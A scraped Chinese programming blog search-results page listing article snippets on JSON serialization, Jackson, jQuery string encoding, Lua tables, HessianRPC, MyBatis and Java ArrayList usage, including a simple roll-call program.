前端技术
HTML
CSS
Javascript
前端框架和UI库
VUE
ReactJS
AngularJS
JQuery
NodeJS
JSON
Element-UI
Bootstrap
Material UI
服务端和客户端
Java
Python
PHP
Golang
Scala
Kotlin
Groovy
Ruby
Lua
.net
c#
c++
后端WEB和工程框架
SpringBoot
SpringCloud
Struts2
MyBatis
Hibernate
Tornado
Beego
Go-Spring
Go Gin
Go Iris
Dubbo
HessianRPC
Maven
Gradle
数据库
MySQL
Oracle
Mongo
中间件与web容器
Redis
MemCache
Etcd
Cassandra
Kafka
RabbitMQ
RocketMQ
ActiveMQ
Nacos
Consul
Tomcat
Nginx
Netty
大数据技术
Hive
Impala
ClickHouse
DorisDB
Greenplum
PostgreSQL
HBase
Kylin
Hadoop
Apache Pig
ZooKeeper
SeaTunnel
Sqoop
Datax
Flink
Spark
Mahout
数据搜索与日志
ElasticSearch
Apache Lucene
Apache Solr
Kibana
Logstash
数据可视化与OLAP
Apache Atlas
Superset
Saiku
Tesseract
系统与容器
Linux
Shell
Docker
Kubernetes
[使用JSONstringify将数组序列...]的搜索结果
这里是文章列表。热门标签的颜色随机变换,标签颜色没有特殊含义。
点击某个标签可搜索标签相关的文章。
点击某个标签可搜索标签相关的文章。
JSON
...,其结构包括键值对、数组和嵌套对象等多种形式。 ObjectMapper , 在Jackson库中,ObjectMapper是一个核心类,主要用于实现JSON与Java对象之间的相互转换。它可以将Java对象序列化为JSON字符串,也可以将JSON字符串反序列化为各种Java类型,如基本类型、List、Set、Map以及自定义Java Bean等。在本文的具体情境中,ObjectMapper通过readValue方法将JSON字符串转换成一个Map对象。 TypeReference , 这是Jackson库中的一个泛型类,用于在运行时捕获并保存泛型类型信息。由于Java的类型擦除机制,无法直接获取到参数化类型的Class对象,而TypeReference则提供了一种方式绕过这个问题,在JSON反序列化过程中,能够精确地指定目标类型,从而帮助ObjectMapper准确地将JSON内容转换为具有复杂泛型结构的Java对象,如Map<String, Object>或其他嵌套类型的集合。在文章示例代码中,TypeReference用于指示将JSON字符串转换为Map类型。
2023-12-27 11:56:29
500
逻辑鬼才
JSON
...表示和传输数据,包括字符串、数字、布尔值、数组以及嵌套的对象结构等,并通过JavaScript中的语法进行遍历和操作。 前后端交互 , 前后端交互是指在Web应用程序开发过程中,前端(用户界面)与后端(服务器端逻辑)之间进行数据传递、请求处理和响应的过程。在本文语境下,JSON作为一种常用的数据交换格式,在前后端交互时起到了关键作用,前端将用户输入或操作转化为JSON格式发送给后端,后端处理后又以JSON格式返回结果,前端再对JSON数据进行解析并更新页面状态。 for-in循环 , for-in是JavaScript中的一种循环结构,用于遍历一个对象的所有可枚举属性(不包含Symbol类型和继承自原型链的属性)。在文中,通过for-in循环可以依次取出JSON对象中的每一个属性名(key)及其对应的值,实现对JSON数据的逐项访问和操作。对于嵌套的JSON对象或数组,开发者可以通过递归或其他方式配合for-in循环实现深度遍历。
2023-03-20 23:03:41
516
程序媛
JSON
...形式组织,也可以构成数组结构,易于人阅读和编写,同时也易于机器解析和生成。在web开发领域,JSON常用于服务端与客户端之间交换数据,由于其简洁且通用性高,被广泛应用于API接口、配置文件、缓存数据等多种场景。 JavaScript对象 , 在JavaScript编程语言中,对象是一种复杂的数据类型,它由零个或多个无序的名/值对组成,这些名/值对也称为属性。属性可以是任何JavaScript数据类型,包括基本类型如字符串、数字、布尔值以及引用类型如其他对象和函数。在JSON中,JavaScript对象通过键(字符串)和对应的值进行表示,且遵循特定的语法规则。 JSON.parse()方法 , 这是JavaScript内置的一个全局函数,用于将一个JSON格式的字符串转换为等效的JavaScript值或对象。例如,当接收到从服务器返回的JSON格式的数据时,可以通过调用JSON.parse()方法将其解析成JavaScript对象,以便进一步操作和处理数据。 JSON.stringify()方法 , 同为JavaScript内置的方法,它的功能与JSON.parse()相反,用于将JavaScript对象或值转换为JSON格式的字符串。开发者通常在需要将JavaScript对象发送到服务器或其他环境,或者保存为本地存储时使用此方法。JSON.stringify()还可以接受可选参数,用于控制序列化过程中如何处理对象属性及函数等内容。
2023-06-02 13:33:53
291
数据库专家
JSON
...法简洁、清晰,可表示数组、对象、字符串、数字、布尔值以及null等多种数据类型,并且支持日期和时间的ISO-8601格式表示。 UTC时间(Coordinated Universal Time) , 协调世界时,是一种国际标准的时间尺度,基于原子钟精确测量得到,不随地球自转变化而调整。在JSON中通常以ISO-8601格式(如1995-01-02T15:04:05.999Z)表示时间戳,其中“Z”代表零时区,即UTC时间。 ISO-8601 , 是国际标准化组织制定的日期和时间表示法标准,它定义了一套统一的日期和时间表示格式。在JSON中,时间戳通常按照ISO-8601格式进行序列化,例如\ 1995-01-02T15:04:05.999Z\ ,这种格式包括年月日小时分钟秒以及可选的小数秒部分,并可以通过加减时区偏移量来转换为不同地区的本地时间。 JavaScript Date对象 , 在JavaScript编程语言中,Date对象用于处理日期和时间,提供了获取当前日期和时间、设置日期和时间、计算日期与时间之间的时间差等功能。在处理JSON中的时间信息时,可以将符合ISO-8601格式的字符串转化为Date对象,进而进行各种时间相关的计算,包括时区转换等操作。 时区偏移量 , 是指特定地点或地区相对于UTC时间的标准时间差,通常用小时和分钟表示,例如+08:00表示东八区(北京时间)。在处理多时区的JSON数据时,需要计算并应用这个偏移量来实现时间的正确转换和显示。
2023-08-18 10:38:11
520
算法侠
JSON
...表示简单的数据类型如字符串、数字、布尔值,也可以嵌套表示复杂的数据结构如数组和对象。 结构体(在Go语言中) , 在Go编程语言中,结构体是一种自定义复合数据类型,允许开发者组合多个不同类型的字段来创建新的数据类型。结构体成员可以是任何基本类型或自定义类型,甚至可以包含其他结构体作为其字段,形成嵌套结构。在处理JSON数据时,Go语言的结构体被用来映射JSON对象的结构,通过为结构体字段添加json标签,可以实现JSON数据与结构体字段之间的序列化和反序列化操作。 序列化与反序列化 , 序列化是将数据结构或对象转换为可以进行持久化存储或网络传输的形式(通常为字节流)的过程。在Go语言处理JSON时,结构体的序列化是指将结构体实例转化为JSON字符串;而反序列化则是相反的过程,即将JSON字符串解码恢复成相应的结构体实例。Go语言内置的encoding/json包提供了对JSON数据进行序列化和反序列化的支持,使得程序能够方便地与JSON格式的数据进行交互。
2024-01-12 17:00:16
530
码农
JSON
...发者能够方便地将数据序列化为JSON字符串在网络间传输或存储,并反序列化还原为原生对象进行处理。 JSONPath , 类似于XPath在XML文档中的作用,JSONPath是一种查询和筛选JSON数据的语言,可以用来定位JSON文档中的特定节点或者满足一定条件的子集。在本文给出的例子中,通过使用JSONPath表达式 $.. ?(@.age >= 30) ,我们能快速准确地找到所有年龄大于等于30岁的用户对象,从而展现出相对于传统遍历方法更高的查询效率。 filter() 方法 , filter() 是JavaScript数组的一个内置方法,用于创建一个新的数组,其中包含通过所提供函数实现的测试的所有元素。在文章提到的具体场景中,filter() 方法接收一个回调函数作为参数,该函数会应用到数组的每个元素上,只有当回调函数返回true时,该元素才会被包含在新创建的数组中。所以,在查询JSON数据中年龄大于等于30岁的用户时,filter() 方法直接根据给定的条件过滤出符合条件的用户对象,相比for循环遍历的方式,代码更简洁且执行速度更快。
2023-09-15 23:03:34
484
键盘勇士
JQuery
... jQuery 中文字符编码转换的艺术 1. 引言 为什么需要中文转编码? 当我们深入探索jQuery的世界,尤其是在处理网页交互、数据传输以及DOM操作时,中文字符的正确编码与解码是我们无法回避的问题。在咱们做JavaScript和Web开发这行,由于一些陈年旧账和技术的迭代更新,浏览器之间的兼容性问题时不时就会冒个泡。所以啊,老铁们,确保字符串都以UTF-8这种格式编码,那可是相当关键的一环,可马虎不得!尤其是当你在URL查询参数、Ajax请求内容或JSON数据序列化过程中遇到包含中文字符的字符串时,不恰当的编码可能会导致乱码或数据丢失。本文将带你通过生动具体的示例,揭示如何运用jQuery巧妙地实现中文字符到UTF-8编码的转换。 2. 理解基础 字符编码与Unicode 首先,让我们对“字符编码”这个概念有个基本的认识。在计算机世界里,每个字符都有对应的数字编码,比如ASCII码对于英文字符,而Unicode则是一个包含了全球所有语言字符的统一编码方案。UTF-8是一种变长的Unicode编码方式,它能高效地表示各种语言的字符,特别是对于中文这种非拉丁字符集尤为适用。 3. jQuery不是万能钥匙 JavaScript原生方法 尽管jQuery提供了丰富的DOM操作接口,但在处理字符串编码问题上,并没有直接提供特定的方法。实际上,我们通常会借助JavaScript的内置函数来完成这一任务。这是因为,在JavaScript的大脑里,它其实早就把字符串用UTF-16编码(这货也是Unicode家族的一员)给存起来了。所以,在我们捣鼓JS的时候,更关心的是怎么把这些字符串巧妙地变身成UTF-8格式,这样一来它们就能在网络世界里畅行无阻啦。 javascript // 假设有一个包含中文的字符串 var chineseString = "你好,世界!"; // 转换为UTF-8编码的字节数组 // 注意:在现代浏览器环境下,无需手动转码,此步骤仅作演示 var utf8Bytes = unescape(encodeURIComponent(chineseString)).split('').map(function(c) { return c.charCodeAt(0).toString(16); }); console.log(utf8Bytes); // 输出UTF-8编码后的字节表示 上述代码中,encodeURIComponent 方法用于将字符串中的特殊及非ASCII字符转换为适合放在URL中的形式,其实质上就是进行了UTF-8编码。然后使用 unescape 反解这个过程,得到一个已经在内存中以UTF-8编码的字符串。最后将其转化为字节数组并输出十六进制表示。 4. 实战应用场景 Ajax请求与JSON.stringify() 在实际的jQuery应用中,如发送Ajax请求: javascript $.ajax({ url: '/api/some-endpoint', type: 'POST', contentType: 'application/json; charset=UTF-8', // 设置请求头表明数据格式及编码 data: JSON.stringify({ message: chineseString }), // 自动处理中文编码 success: function(response) { console.log('Data sent and received successfully!'); } }); 在这个例子中,jQuery的$.ajax方法配合JSON.stringify将包含中文字符的对象自动转换为UTF-8编码的JSON字符串,服务器端接收到的数据能够正确解码还原。 5. 总结与思考 虽然jQuery本身并未直接提供中文转UTF-8编码的API,但通过理解和熟练运用JavaScript的内建方法,我们依然可以轻松应对这类问题。尤其在处理跨语言、跨平台的数据交换时,确保字符编码的一致性和正确性至关重要。在实际动手操作的项目里,除了得把编码转换搞定,还千万不能忘了给HTTP请求头穿上“马甲”,明确告诉服务器咱们数据是啥样的编码格式,这样才能确保信息传递时一路绿灯,准确无误。下一次当你在jQuery项目中遇到中文编码难题时,希望这篇文章能成为你的得力助手,帮你拨开迷雾,顺利解决问题。记住,编码问题虽小,但关乎用户体验,不容忽视。
2023-04-05 10:17:37
308
凌波微步
JQuery
...JavaScript数组的.join()方法如何有效地将数字拼接为字符串之后,我们发现其在前端开发中扮演了至关重要的角色。特别是在处理大量数据时,如动态生成网页元素内容、构建查询字符串以及进行AJAX请求参数序列化等场景。 最近,随着WebAssembly和高性能JavaScript库的兴起,原生JavaScript性能优化的重要性更为凸显。例如,在Vue 3或React最新版本的应用中,为了提高渲染效率,开发者们更倾向于使用原生JavaScript方法而非框架提供的便捷工具。.join()凭借其高效的内存管理和运行速度,在此类优化实践中发挥了关键作用。 另外,在大数据处理与可视化领域,.join()方法同样被广泛应用。例如,在D3.js库中创建SVG路径时,需要将坐标点数组转换为连续的路径数据字符串,此时.join()就能派上用场,实现高效的数据格式转化。 不仅如此,.join()方法还揭示了JavaScript对Unicode字符集的良好支持,当数组元素包含非ASCII字符时,它依然能准确无误地拼接成字符串,这对于国际化应用开发具有重要意义。 因此,对于前端开发者而言,不仅需要掌握jQuery等库的便捷功能,更要深入了解JavaScript原生API,如.join()这样的基础函数,以应对不断变化的技术趋势和实际应用场景的需求。同时,持续关注ECMAScript新标准的发展,了解并掌握新的字符串处理方式,也是提升开发效能的关键所在。
2023-04-28 20:55:09
44
码农
JSON
...一个重要的数据类型是序列。在JSON中,序列是以方括号[]包围的一系列数据,用逗号分隔开。 [ "apple", "banana", "orange" ] JSON序列的大小指的是序列中项目数量。可以通过统计该序列的大小来获得。 const fruits = ["apple", "banana", "orange"]; const size = fruits.length; console.log(size); // 打印:3 在JavaScript中,也可以通过JSON.parse()函数将JSON字符串变为序列。 const jsonStr = '["apple", "banana", "orange"]'; const fruits = JSON.parse(jsonStr); const size = fruits.length; console.log(size); // 打印:3 需要注意的是,在使用JSON序列时,我们应该保证序列中所有的元素都是同一类型的(比如都是字符串),这样才能更好地进行处理和操作。 以上简单介绍了JSON序列的大小及相关操作,希望对大家有所帮助。
2023-05-08 12:00:44
538
软件工程师
JSON
JSON是一种依据字符串的简洁信息传输格式,它具有清晰可读简便易记、容易理解和兼容多种编程语言等优点。在JSON中,我们可以采用JSON列表来记录一连串数据项。区别于常规的数组,JSON列表是一个非有序集合,即数组中的每个元素并不需要给定一个索引位置,而是可以采用键值组合形式进行键值组合的记录。 { "fruits": [ {"name": "apple", "color": "red", "shape": "round"}, {"name": "banana", "color": "yellow", "shape": "long"}, {"name": "orange", "color": "orange", "shape": "round"}, {"name": "grape", "color": "purple", "shape": "round"} ] } 在上面的JSON数据中,"fruits"是一个含有四个对象的JSON列表,每个对象都有相应的"name"、"color"、"shape"字段值。在实际采用JSON时,可以采用for-in循环来遍历这样的JSON列表,取得其中的键值组合信息。 var data = JSON.parse('{"fruits":[{"name":"apple","color":"red","shape":"round"},{"name":"banana","color":"yellow","shape":"long"},{"name":"orange","color":"orange","shape":"round"},{"name":"grape","color":"purple","shape":"round"}]}'); for(var i in data.fruits) { console.log("Name: " + data.fruits[i].name + ", Color: " + data.fruits[i].color + ", Shape: " + data.fruits[i].shape); } 上面的JavaScript代码演示了如何解读JSON数据,并采用for-in循环遍历取得数组中的每个对象及其字段值。最终显示的结果为: Name: apple, Color: red, Shape: round Name: banana, Color: yellow, Shape: long Name: orange, Color: orange, Shape: round Name: grape, Color: purple, Shape: round 因此,JSON的非有序集合的特性使得其在处理多个键值组合数据时非常方便,同时也增强了其灵活性。
2023-01-19 19:48:00
519
代码侠
Java
...提到的Write函数使用了OutputStream对象作为参数,表示要写入数据的目的地。具体来说,OutputStream为程序员提供了一种将数据(如字符串、字节数组等)序列化并发送到不同目标(如文件、网络套接字、控制台等)的方法。 LoginException , LoginException是一个自定义异常,在Java编程中用于标识与用户登录验证相关的错误情况。在本文所描述的Login函数中,当提供的用户名和密码无法通过验证时,会抛出一个LoginException异常,以便调用者捕获并处理这种异常情况,通常涉及提示用户登录失败或采取其他安全措施。 数据持久化 , 数据持久化是指程序运行过程中产生的数据状态能够被永久保存下来,并在需要时重新加载至内存中恢复程序状态的过程。在本文中,Write函数实现的就是数据持久化的一种常见方式,即将字符串信息写入到输出流中,进而可能存储到磁盘文件或其他持久化存储介质上,确保即使程序关闭后,这些数据仍然可以被再次读取和利用。
2023-08-11 21:09:32
331
代码侠
Lua
...构之一,它既可以作为数组,也可以作为关联数组或字典使用。然而,在我们实实在在敲代码的时候,经常会遇到这么个让人挠头的小状况:“哎呀,竟然试图访问一个在表格里压根不存在的键”,这样一来,程序可就要闹情绪,抛出运行时错误了。这篇东西,咱们就瞄准这个主题使劲深挖一下,而且我还会甩出多个代码实例,保准让大家伙儿不仅能明白这个问题是怎么回事,更能掌握解决它的方法,保证接地气儿,不带一点儿机器味儿! 1. 键不存在错误的基本概念 首先,我们需要明确的是,当你试图访问一个在Lua表中并不存在的键时,Lua并不会默默地返回nil,而是会抛出一个错误。例如: lua local my_table = {name = "John", age = 30} print(my_table["address"]) -- 这将会抛出错误:attempt to index a nil value (field 'address') 在这个例子中,我们尝试从my_table获取"address"对应的值,但该键并不存在于表中,因此Lua抛出了“键不存在”错误。 2. 如何安全地访问可能不存在的键 为了避免上述错误的发生,我们可以利用Lua中的条件判断和nil检查机制来安全地访问表中的键。下面是一个典型的示例: lua local my_table = {name = "John", age = 30} -- 安全访问方式:先检查键是否存在,再进行访问 if my_table.address then print(my_table.address) else print("Address is not set.") end 或者,你可以使用Lua的rawget函数,它不会触发元方法且对键的类型没有限制,同时也不会抛出错误: lua local address = rawget(my_table, "address") if address then print(address) else print("Address is not set.") end 3. 使用pairs和ipairs遍历检查键的存在性 当不确定表中有哪些键时,可以采用遍历的方式来检查: lua for key, value in pairs(my_table) do if key == "address" then print(value) break end end -- 如果是数字索引的连续数组部分,可以使用 ipairs for i = 1, my_table do if i == my_expected_index then print(my_table[i]) break end end 4. 自定义默认返回值——空合并操作符 // Lua 5.3引入了一个非常有用的特性——空合并操作符(也称为nil合并操作符)//,它可以用于提供默认值: lua local my_table = {name = "John", age = 30} print(my_table.address // "No Address") -- 输出 "No Address" 在这个例子中,如果my_table.address为nil,则会返回后面的字符串"No Address",这样就避免了键不存在的错误。 结语:思考与探讨 理解并妥善处理Lua表中键可能不存在的情况,是Lua编程过程中的重要一环。掌握这些技巧不仅可以避免程序因意外的键访问错误而崩溃,还能使我们的代码更加健壮、易读。希望本文的讨论和实例代码能帮助你更深入地理解这一问题,并在今后的编程实践中灵活运用,让Lua代码如丝般顺滑地运行。记住,编程不仅仅是解决问题,更是不断探索、学习和成长的过程。
2023-05-17 14:22:20
38
春暖花开
JQuery
jQuery数组怎么添加元素 嘿,朋友们!今天咱们来聊聊jQuery中的数组操作。说起数组,你是不是会想:“这不是JavaScript自带的功能吗?”确实是这样,不过jQuery也提供了一些超好用的方法来摆弄数组,尤其是当你在处理DOM元素的时候,感觉就像是如虎添翼一样顺畅。今天我们就聚焦于如何在jQuery中向数组添加元素。 1. 初识jQuery数组操作 首先,咱们得明白一点:虽然jQuery本身并不是一个数组库,但它可以很好地与原生的JavaScript数组协同工作。jQuery 可真是个好东西,它给我们提供了不少方便的方法来摆弄网页上的那些 DOM 元素。很多时候,你得跟数组打交道才能搞定这些操作。 举个栗子,假设我们有一个简单的HTML列表: html Item 1 Item 2 Item 3 如果我们想要通过jQuery获取这个列表中的所有 元素,并将它们存入一个数组中,我们可以这样做: javascript var items = $("myList li"); console.log(items); // 输出: [ , , ] 这里,items就是一个jQuery对象,它包含了所有的 元素。但是,如果我们想把它变成一个真正的数组,可以这样做: javascript var itemsArray = $.makeArray(items); console.log(itemsArray); // 输出: [ , , ] 这时候,itemsArray就是我们想要的数组了。是不是感觉挺简单的? 2. 向数组添加元素 现在,咱们来讨论一下如何向这个数组添加新的元素。首先得搞清楚,jQuery对象自己可不会直接去加元素。不过,我们可以利用原生JavaScript的方法来实现这一点。这里有几个方法可以尝试: 方法一:使用push() 如果你已经有一个数组,并且想要向其中添加一个新的jQuery对象,你可以这样做: javascript // 假设我们有一个新的 元素 var newItem = $(" New Item "); // 使用push方法添加到数组中 itemsArray.push(newItem[0]); console.log(itemsArray); // 输出: [ , , , ] 这里的关键在于newItem[0],这是因为push()方法期望接收的是一个DOM元素,而不是jQuery对象。 方法二:使用concat() 如果你想创建一个新的数组,并将原来的数组与新元素合并,可以使用concat()方法: javascript var newItemsArray = itemsArray.concat(newItem[0]); console.log(newItemsArray); // 输出: [ , , , ] 这种方法不会修改原来的数组,而是返回一个新的数组。 方法三:直接操作DOM 当然,如果你只是想在页面上添加新的元素,而不需要将它们加入数组,可以直接操作DOM: javascript $("myList").append(newItem); 这样,新的 元素就会被追加到 列表中。 3. 实战演练 让我们来实际操作一下,看看这些方法的效果如何。假设我们有一个简单的网页,包含一个按钮和一个无序列表: html Add New Item Item 1 Item 2 Item 3 在这个例子中,当我们点击“Add New Item”按钮时,会执行一系列的操作,包括向数组添加新的元素以及更新页面上的内容。每次点击都会在控制台输出当前的状态,让你可以看到数组的变化。 4. 总结 好了,朋友们,今天咱们聊了聊如何在jQuery中向数组添加元素。虽然jQuery自己没带数组操作的功能,但我们可以用原生JavaScript的方法来搞定。不管是用push()方法还是concat()方法,或者是直接摆弄DOM,咱们都能达成目标。 希望这篇文章对你有所帮助,如果你有任何问题或者建议,欢迎在评论区留言交流。编程路上,我们一起前行!
2025-03-10 16:14:39
52
清风徐来
HessianRPC
...下几种方法: 1. 序列化和反序列化 Hessian支持对象的序列化和反序列化,可以将复杂的业务对象转换为简单的字符串,然后在网络上传输,接收端再将字符串转换回对象。 2. HTTP请求 Hessian可以将对象作为HTTP请求体发送,接收端同样可以解析请求体得到对象。 3. Socket编程 Hessian也可以通过Socket编程的方式进行数据传输,这种方式更加灵活,适用于需要实时通信的场景。 下面我们分别通过一个例子来演示这些方法。 四、使用Hessian进行序列化和反序列化 首先,我们创建一个简单的类User: java public class User { private String name; private int age; public User(String name, int age) { this.name = name; this.age = age; } // getters and setters... } 然后,我们可以使用Hessian的writeValueTo()方法将User对象序列化为字符串: java User user = new User("Tom", 20); String serialized = Hessian2.dump(user); 接收到这个字符串后,我们可以通过Hessian的readObjectFrom()方法将其反序列化为User对象: java User deserialized = (User) Hessian2.unmarshal(serialized); 五、使用Hessian进行HTTP请求 在Spring框架中,我们可以使用HessianProxyFactoryBean来创建一个代理对象,然后通过这个代理对象来调用远程服务。 例如,我们在服务器端有一个接口UserService: java public interface UserService { User getUser(String id); } 然后,客户端可以通过如下方式来调用远程服务: java HessianProxyFactoryBean factory = new HessianProxyFactoryBean(); factory.setServiceUrl("http://localhost:8080/service/UserService"); factory.afterPropertiesSet(); UserService userService = (UserService) factory.getObject(); User user = userService.getUser("1"); 六、使用Hessian进行Socket编程 如果需要进行实时通信,我们可以直接使用Socket编程。首先,在服务器端创建一个监听器: java ServerSocket serverSocket = new ServerSocket(8080); while (true) { Socket socket = serverSocket.accept(); InputStream inputStream = socket.getInputStream(); OutputStream outputStream = socket.getOutputStream(); String request = readRequest(inputStream); String response = handleRequest(request); writeResponse(response, outputStream); } 然后,在客户端创建一个连接: java Socket socket = new Socket("localhost", 8080); OutputStream outputStream = socket.getOutputStream(); InputStream inputStream = socket.getInputStream(); writeRequest(request, outputStream); String response = readResponse(inputStream); 七、结论 总的来说,Hessian是一种非常强大的工具,可以帮助我们高效地进行大数据量的传输。甭管是Web服务、手机APP,还是嵌入式小设备,你都能发现它的存在。在接下来的工作日子里,咱们得好好琢磨和掌握这款工具,这样一来,工作效率自然就能蹭蹭往上涨啦!
2023-11-16 15:02:34
468
飞鸟与鱼-t
MyBatis
...支持,开发者可以直接使用LocalDate、LocalDateTime等类型,并且MyBatis内置的TypeHandler已经提供了对应的数据库类型映射。 此外,对于复杂类型如JSON或XML数据,在MyBatis中也有了更灵活的处理方式。例如,通过Jackson库或者Gson库将Java对象序列化为JSON字符串存储至数据库TEXT类型字段,同时利用MyBatis的TypeHandler进行反序列化,实现了与NoSQL数据库类似的便捷操作。 在实际项目开发中,为了提高代码可读性和维护性,推荐遵循领域驱动设计(DDD)原则,结合MyBatis的特性进行实体类的设计与映射配置。例如,可以运用自定义通用型TypeHandler来处理特定业务场景下的类型转换问题,以降低耦合度,提升系统扩展性。 另外,值得注意的是,随着JPA等规范的发展,Spring Data JPA作为基于JPA规范的持久层解决方案,提供了更为强大的自动类型映射能力,对于简化开发工作流和团队协作具有显著优势。然而,尽管如此,MyBatis因其高度的灵活性和对复杂SQL查询的强大支持,在许多大型项目中仍然保持着不可替代的地位。 综上所述,了解并掌握MyBatis的数据类型映射原理及其实战技巧,结合当下前沿技术动态,有助于我们在项目实践中更好地权衡选择,优化数据访问层的实现方案。
2023-12-18 11:45:51
118
半夏微凉-t
转载文章
...是一个可以动态修改的数组,与普通数组的区别就是它是没有固定大小的限制,我们可以添加或删除元素。 2. ArrayList 继承了 AbstractList ,并实现了 List 接口。 3. ArrayList 类位于 java.util 包中,使用前需要引入它,语法格式如下: import java.util.ArrayList; // 引入 ArrayList 类ArrayList<E> objectName =new ArrayList<>(); // 初始化 4. ArrayList 是一个数组队列,提供了相关的添加、删除、修改等功能。 5. ArrayList 中的元素实际上是对象,在以上实例中,数组列表元素都是字符串 String 类型。 如果我们要存储其他类型,而 <E> 只能为引用数据类型,这时我们就需要使用到基本类型的包装类。 基本类型对应的包装类表如下: 基本类型 引用类型 boolean Boolean byte Byte short Short int Integer long Long float Float double Double char Character 访问 ArrayList 中的元素可以使用 get() 方法: public static void main(String[] args) {ArrayList<String> sites = new ArrayList<String>();sites.add("weipinhui");sites.add("pinduoduo");sites.add("Taobao");sites.add("jingdong");System.out.println(sites);} 注意:数组的索引值从 0 开始。 ArrayList 类提供了很多有用的方法,添加元素到 ArrayList 可以使用 add() 方法 public static void main(String[] args) {ArrayList<String> sites = new ArrayList<String>();sites.add("weipinhui");sites.add("pinduoduo");sites.add("Taobao");sites.add("jingdong");sites.set(2, "Weixin"); // 第一个参数为索引位置,第二个为要修改的值System.out.println(sites);} 如果要修改 ArrayList 中的元素可以使用 set() 方法: public static void main(String[] args) {ArrayList<String> sites = new ArrayList<String>();sites.add("weipinhui");sites.add("pinduoduo");sites.add("Taobao");sites.add("jingdong");sites.set(2, "Weixin"); // 第一个参数为索引位置,第二个为要修改的值System.out.println(sites);} 如果要删除 ArrayList 中的元素可以使用 remove() 方法: public static void main(String[] args) {ArrayList<String> sites = new ArrayList<String>();sites.add("weipinhui");sites.add("pinduoduo");sites.add("Taobao");sites.add("jingdong");sites.remove(3); // 删除第四个元素System.out.println(sites);} 如果要计算 ArrayList 中的元素数量可以使用 size() 方法: public static void main(String[] args) {ArrayList<String> sites = new ArrayList<String>();sites.add("weipinhui");sites.add("pinduoduo");sites.add("Taobao");sites.add("jingdong");System.out.println(sites.size());} 使用Scanner、Random、ArrayList完成一个不重复的点名程序: public static void main(String[] args) {//可以使用Arrays的asList实现序列化一个集合List<String> list= Arrays.asList("叶枫","饶政","郭汶广","王志刚","时力强","柴浩阳","王宁","雷坤恒","贠耀强","齐东豪","袁文涛","孙啸聪","李文彬","孙赛欧","曾毅","付临","王文龙","朱海尧","史艳红","赵冉冉","詹梦","苏真娇","张涛","王浩","刘发光","王愉茜","牛怡衡","臧照生","梁晓声","孔顺达","田野","宫帅龙","高亭","张卓","陈盼盼","杨延欣","李蒙惠","瞿新成","王婧源","刘建豪","彭习峰","胡凯","张武超","李炳杰","刘传","焦泽国");//把list作为参数重新构建一个新的ArrayList集合ArrayList<String> names=new ArrayList<>(list);//使用Scanner、Random、ArrayList完成一个不重复的点名程序Random random=new Random();Scanner scanner=new Scanner(System.in);while(true){//如果集合中没有元素了别结束循环if(names.size()==0){System.out.println("已完成所有学生抽查,抽查结束请重新开始");break;}System.out.println("确认点名请输入吧Y/y");String input=scanner.next();if(input.equals("Y")||input.equals("y")){//随机一个集合下标int index=random.nextInt(names.size());System.out.println(""+names.get(index));//该学生已经被抽到,把他从集合中移除names.remove(index);}else{System.out.println("本次抽查结束");break;} }} 本篇文章为转载内容。原文链接:https://blog.csdn.net/gccv_/article/details/128037485。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2024-02-19 12:24:39
583
转载
转载文章
...对于list和map使用CollectionUtils.isEmpty()判空(null和size=0) 对于对象使用ObjectUtils.isEmpty()判定,可以尝试使用Optional.ofNullable() 对于数组使用ArrayUtils.isEmpty()判空(null和length=0) 对于字符串使用 StringUtils.isBlank()判空(null和空字符串) 工具类 使用hutool可以方便的进行文件类型的判断、唯一id(uuid,Snowflake)的生成、数据加密解密、二维码生成、图片加水印、BASE64编码解码、图片验证码等操作 集合 使用Arrays.asList()返回的list为数组的内部list,只允许遍历不允许增删,可以使用Stream流转换为list Collection和map对于仅遍历可以使用增强for循环和,但如果有删除为避免错误必须使用迭代器 foreach遍历不允许改变变量的地址,java的参数是值传递,修改了形参的地址并不影响原来的参数,故即使你修改了值也不会同步到原变量中,故操作的变量都显式或者隐式的定义为final JSON fastjson parseArray(String text, Class<T> clazz) 解析List parseObject(String text, Class<T> clazz) 解析Object JSON对于null、空白字符串、“null”会返回nullif (text == null) {return null;} else {DefaultJSONParser parser = new DefaultJSONParser(text, ParserConfig.getGlobalInstance());JSONLexer lexer = parser.lexer;int token = lexer.token();ArrayList list;if (token == 8) {lexer.nextToken(); // nextToken() => ...if ("null".equalsIgnoreCase(ident)) this.token = 8;list = null;} } String toJSONString(Object object) 将对象转为String toJSONBytes(Object object, SerializerFeature... features) 将对象转为byte[] @JSONField() 可以忽略字段serialize ,别名映射name,日期格式化format等 jackson @JsonFormat(pattern = "yyyy-MM-dd HH:mm:ss") 设置Date到前台的格式 @JsonIgnore SpringMVC不会向前台传递该字段 ObjectMapper mapper = new ObjectMapper();String str = mapper.writeValueAsString(admin); // 对象转JSON字符串mapper.readValue(s,Admin.class ); // JSON字符串转对象 EasyExcel 官方API https://www.yuque.com/easyexcel/doc 使用类注解@ExcelIgnoreUnannotated配合@ExcelProperty操作 @ExcelProperty可以指定表头列名,列顺序和表头的合并 @ColumnWidth(10)可以指定列宽,其长度约为(中文length3+英文length1) @DateTimeFormat(value="yyyy-MM-dd HH:mm:ss")可以指定日期格式 自定义策略实现SheetWriteHandler工作表回调接口,在afterSheetCreate()工作表创建之后方法可以 设置列宽 自定义表头 新建单元格 自定义策略实现RowWriteHandler行回调接口,在afterRowDispose()行操作完之后方法可以 设置行高 设置行样式 自定义策略实现CustomerCellHandler单元格回调接口,在afterCellDispose()单元格操作完之后方法可以 根据行号,列宽甚至是单元格的值来设置单元格样式 可以对单元格的值获取和修改 样式通常包括内容格式、批注、背景色、自动换行、平和垂直居中、边框大小和颜色、字体实例(格式,颜色,大小,加粗等)等 自定义策略继承AbstractMergeStrategy单元格合并抽象类,在merge()方法中可以通过CellRangeAddress合并单元格 过于复杂的表格可以使用模板,配合写出write和填充fill一起使用 Mybatis 在mapper方法的@select中也是可以直接书写动态SQL的,但要使用<script></script>包裹,这样就不用在java文件和xml文件切换了,将@select中包裹的代码直接放到浏览器的控制台输出后会自动转义\n,\t,+,"等 动态sql中“<” 和 “>” 号要用转义字符 “<” 和 ”>“ (分号要带) 动态sql中test中表达式通常使用 test=“id != null and id != ‘’”,要注意的是字符串不能直接识别单引号,有两种方法使用id==“1001"或者id==‘1001’.toString(),另外参数如果是boolean,可以直接使用test=”!flag",如果判定集合的话可以使用 test=“list != null and 